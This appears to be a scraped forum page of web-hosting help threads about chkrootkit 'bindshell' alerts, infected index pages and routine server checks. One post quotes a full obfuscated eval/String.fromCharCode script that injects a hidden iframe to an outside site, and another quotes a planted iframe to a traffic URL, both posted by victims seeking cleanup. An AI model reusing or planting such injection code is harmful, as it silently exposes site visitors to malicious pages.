Checking `bindshell'... INFECTED (PORTS: 465)

Jul 29, 2007

I run CHKROOTKIT Scan and found that:

Checking `bindshell'... INFECTED (PORTS: 465)

View 2 Replies


ADVERTISEMENT

Bindshell INFECTED

Jan 15, 2007

Quote:

Searching for rootedoor... nothing found
Searching for anomalies in shell history files... Warning: `//root/.mysql_history' file size is zero
nothing found
Checking `asp'... not infected
Checking `bindshell'... INFECTED (PORTS: 465)
Checking `lkm'... chkproc: nothing detected
Checking `rexedcs'... not found

Above is a part of chkrootkit report i receive everyday,today seem something is wrong as bindshell is INFECTED.Any suggestion what should i do in this case?

View 5 Replies View Related

Checking Ports

Apr 23, 2008

I have opened up ports 5151 and 123 via iptables. From outside the box, is there a way I can verify that these ports are open?

View 6 Replies View Related

Myip:0 -- Mixing * Ports And Non-* Ports With A NameVirtualHost Address

Mar 2, 2008

i have one problem in cpanel take one error for restart httpd

xx.xxx.xxx.xx:0 -- mixing * ports and non-* ports with a NameVirtualHost address is not supported, proceeding with undefined results

View 2 Replies View Related

Bindshell Port Open 444

Oct 18, 2009

I got a msg from the server that a port 444 is open in my server, how could i know what the bindshell ports open in my server and how to close it please ?

Code:
Checking `bindshell'... INFECTED (PORTS: 444)
i use cpanel/csf firewall

View 10 Replies View Related

Infected Web Pages

Jun 10, 2009

150 php pages infected codes like.... As we do not have a backup..is there any commands to remove it

<script type="text/javascript">eval(String.fromCharCode(118,97,114,32,106,104,113,119,61,49,50,51,49,49,49,51,43,50,53,59,118,97,114,32,103,104,103,52,53,61,34,107,97,11 4,34,59,11 8,97,114,32,119,61,34,108,97,115,116,34,59,118,97,114,32,114,101,54,61,34,46,34,59,118,97,114,32,104,50,104,61,34,99,111,109,34,59,118,97,114,32,97,61 ,34,105,10 2,114,34,59,118,97,114,32,115,61,34,104,116,116,34,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,39,97,109,101,32,115, 114,39,43, 39,99,61,34,39,43,115,43,39,112,58,47,47,39,43,103,104,103,52,53,43,39,39,43,119,43,39,39,43,114,101,54,43,39,39,43,104,50,104,43,39,47,39,43,39,34,32 ,119,105,1 00,39,43,39,116,104,61,34,49,34,32,104,39,43,39,101,105,103,104,116,61,34,51,34,62,60,47,105,102,39,43,39,114,39,43,39,97,109,101,62,39,41,59,32,102,1 17,110,99, 116,105,111,110,32,103,103,54,51,52,53,40,41,123,118,97,114,32,97,115,51,49,49,51,61,57,43,55,53,52,52,59,125,32,118,97,114,32,109,110,98,113,61,52,51 ,48,52,49, 56,50,52))</script>

Is there any command to search and replace this whole string from files...normal sed is not seems to be working with these symbols.

View 8 Replies View Related

My Server Infected

Oct 26, 2007

seem that my server is infected by this virus Exploit.HTML.IESlice.h
it insert iframe code to index page and forward visitors to another site.

my server is running centos 4.5 and WHM/Cpanel, which antivirus software i need to use or other methods to eliminate this virus?

View 1 Replies View Related

All Index Files Got Infected

Jun 12, 2007

after week when my server upgrade the cpanel automatic i got infected in all
index files like index.html and index.php and index.asp and any index with any
extinstion and this is the code in all files

Code:
<iframe src=[url]

and when i delete this code it come again in all index files

i am in really trouble with my clients and i want to know how can i fix this
thing and never come back again

View 14 Replies View Related

Websites Infected With Trojan How To Solve?

Nov 16, 2008

i see my websites are infected with some trojan.

there are some iframe tag simlilar to this in all index files

<iframe src="http://traff<<removed>>.cn/in.cgi?27" width=100 height=80></iframe>
any idea how might this iframe inserted in my codes.

i have tried to format my systems and remove all saved ftp passwords , but still this virus is comming back and the strange thing is i have website on different servers infected with same virus
any idea how this is happened and how to avoide this?

View 9 Replies View Related

Index Files Got Infected " "

Mar 12, 2008

i have amny server , and i got about 7 server got infected

2 weeks ago i got some sites have avirs i delted the code which got added on some index.html & index.php " any index files "

i removed the code and cleaned the servers,

after 2 hrs i saw it back again.

i made scan and i got them back, i replaced the pages with cleaned pages, and removed it again.

but till now it came back after i remove.

how can i protict my server from this issus

View 3 Replies View Related

DB Checking

Nov 18, 2007

My server is a linux based o
How I can check all the databases on my server to see which of the DBs are corrupted?

View 2 Replies View Related

Disk Checking (I/O)

May 20, 2009

My server load is high, i checked and see everuthing is ok.

I think my sata disk cannot support my hard disk traffic.

Is it posible to check wich file used more hard disk traffic? (rpm speed)

View 7 Replies View Related

Checking VPS RAM - OpenVZ

Nov 28, 2007

I am looking at a VPS of one friend, using OpenVZ. It has 256MB RAM, but it always goes down, and the host asks my friend to upgrade to larger RAM. I have read that if UBC setting is too low, the VPS could not use all allocated RAM, not sure if it's correctly or not, but is there anyway to check?

This is some info ...

View 5 Replies View Related

Clamav Checking

Jun 21, 2007

I have it installed on server, but sometimes it's dead, but no warning from system. It will prevent emails working then. So I wonder if there is any way to check clamav? when it's not working, system will release an email to the admin?

View 8 Replies View Related

Checking RAM And Memory

Aug 9, 2008

is there any method to check if all the memory on a server is working?

View 3 Replies View Related

Function Checking

Mar 5, 2007

How can figure out which functions are active on my server?
I have root access and the server is Linux.

I want to know wheather the function "fsockopen" is open or not.

View 7 Replies View Related

Checking Log Files

Jan 18, 2007

I'm on shared hosting (apache) and would like to closer inspect my log files. 2 questions I have at the moment.

1. Where can I typically find my log files for downloading?

2. Is there any good (free) software I can use locally (Windows desktop) that can manage these logs i.e. stats, searches etc? At the moment I mainly want to run a search on the log files.

View 2 Replies View Related

Checking Outgoing Mail

Feb 13, 2008

Is there a way to track outgoing mail that's sent from a Linux server? I'm running on Fedora 8 now, and would like to confirm and check mail that's being sent out by a PHP application.

View 4 Replies View Related

Checking Blacklisted IP Addresses Given

Aug 5, 2009

Searching G, I find these for running checks on blacklisted ips:

http://whatismyipaddress.com/staticp...ss-blacklisted

http://www.mxtoolbox.com/blacklists.aspx

Which both seem to be for blacklisted email servers. But what about checking if the ip has been blacklisted for other reasons ( business practices, reports of complaint, adult sites, etc)

What is a decent check?

This is for checking on newly assigned dedicated ip's ( or other) before applying them to domains on a new account.

View 0 Replies View Related

Checking A Domain For RBL Listing

Nov 21, 2008

Checking a domain for RBL listing

How can I check if my domain is listed in the RBL listing?

View 7 Replies View Related

Checking HELO Greeting Where

Apr 3, 2008

I'd like to look at what my HELO configuration is but don't know how or where to look.

I am using a dedicated Linux/cPanel server. I'd like to make sure the HELO is configured correctly. My mailing software is EXIM.

View 1 Replies View Related

3ware Raid Checking

Mar 3, 2007

I have installed 3dm for checking 3ware 8086 card status, but when going to [url] it doesnt show anything. It seems cannot connect to 1080 port, even I have turned off the firewall. Have checked in its config file already to make sure the port is 1080

Is there anyone having experience with 3dm software?

View 3 Replies View Related

Phone System Checking

Jun 14, 2007

I'm thinking to implement a solution for our VOIP system so that automatic calls should be done several times a day and to check that someone is responding or that it's ringing.

We are using AsteriskWin32 for now and for our needs it's working great.

View 0 Replies View Related

Checking For Spam Mail

Sep 22, 2007

I received abuse, and I would like to know if there is a good method to check for clients who are sending out spam mail, so I can take action.

If you know any methods that would work to find clients who are sending out spam mail,

View 3 Replies View Related

[HyperVM/OpenVZ] Checking How Much Free RAM Is Available

May 14, 2009

Calling all HyperVM/OpenVZ gurus!

Since OpenVZ offers both base RAM and burstable RAM to VMs, checking how much RAM is still available for assigning to VMs is still done manually by me.

Is there a way to list the total amount of base RAM that has been assigned, and the total amount of burstable RAM that has been assigned, so that you know how many more VMs you can create/host on a server?

View 3 Replies View Related

Cpu Resources / Load Script Checking

Apr 20, 2009

Does anyone know where i can get script that can run on a server to check
if some users use above 50% of the resources or cpu load

View 3 Replies View Related

Checking Someone Elses Server Bandwidth

Apr 27, 2009

Is there a way to check someone elses server for bandwidth usage?

I was asked this weekend if there is a way to get an estimate of bandwidth for a similar website to one a person wants to design?

View 5 Replies View Related

Detail Process Checking Command

Jul 25, 2009

which command we used to get detail information of a process running on server and which much give out put like below example

User Domain %CPU %MEM MySQL Processes
mydomainusername mydomain.com 36.78 247.14 5.9
Top Process %CPU 82.0 httpd [mydomain.com] [/forum/index.php?showtopic71748]
Top Process %CPU 64.5 httpd [mydomain.com] [/forum/]
Top Process %CPU 45.3 httpd [mydomain.com] [/forum/index.php?showforum11&prune_day100&sort_byZ-A&sor]

View 1 Replies View Related

Checking Versions Of Library/so Files

Apr 14, 2009

Different problem than my earlier thread:
[url]

I freely admit this is something that is self inflicted as I made the mistake of trying to install OpenSSH from source on my own despite me knowing that OpenSSL was kinda goofy (as in I had 0.9.8g and 0.9.8i libraries all over the place).

I know that I have OpenSSL 0.9.8k installed and working. PHP and Apache are both reporting that they are using the k release. I'm good there. However cURL and proftpd are still linking to the g release libraries and for the life of me, I cannot find where these buggers are. ld.so.conf is pointed at the newer libraries in /usr/local/lib and /usr/local/ssl/lib and I re-ran ldconfig to make sure.

Is there a way to verify a version of the library/so files because this is killing me. I'm kinda like Monk (USA TV) only instead of germs, I'm freaked out by lame libraries and includes.

edit: what I *think* is happening, based on the timestamps, is that cURL and proftpd are using the libraries in the /usr/lib64 directory instead of /usr/lib. What I don't get is when I make;make install, why things are only going into /usr/lib and /usr/local/lib and not into the /usr/lib64 directory despite my ./config stating that the libraries are being built for x86_64. Is it as simple as copying things over?

View 1 Replies View Related

Minimize / Checking For Fraud Orders

Oct 24, 2008

what are some of the ways to minimize credit/debit card fraud when someone purchases services over the Internet? I understand the following are commonly used:

-AVS check

-IP of customer vs. Billing Address

-Amount of order

With chargeback fees so high I'd really like to minimize fraud without tossing legit orders.

View 2 Replies View Related







Copyrights 2005-15 www.BigResource.com, All rights reserved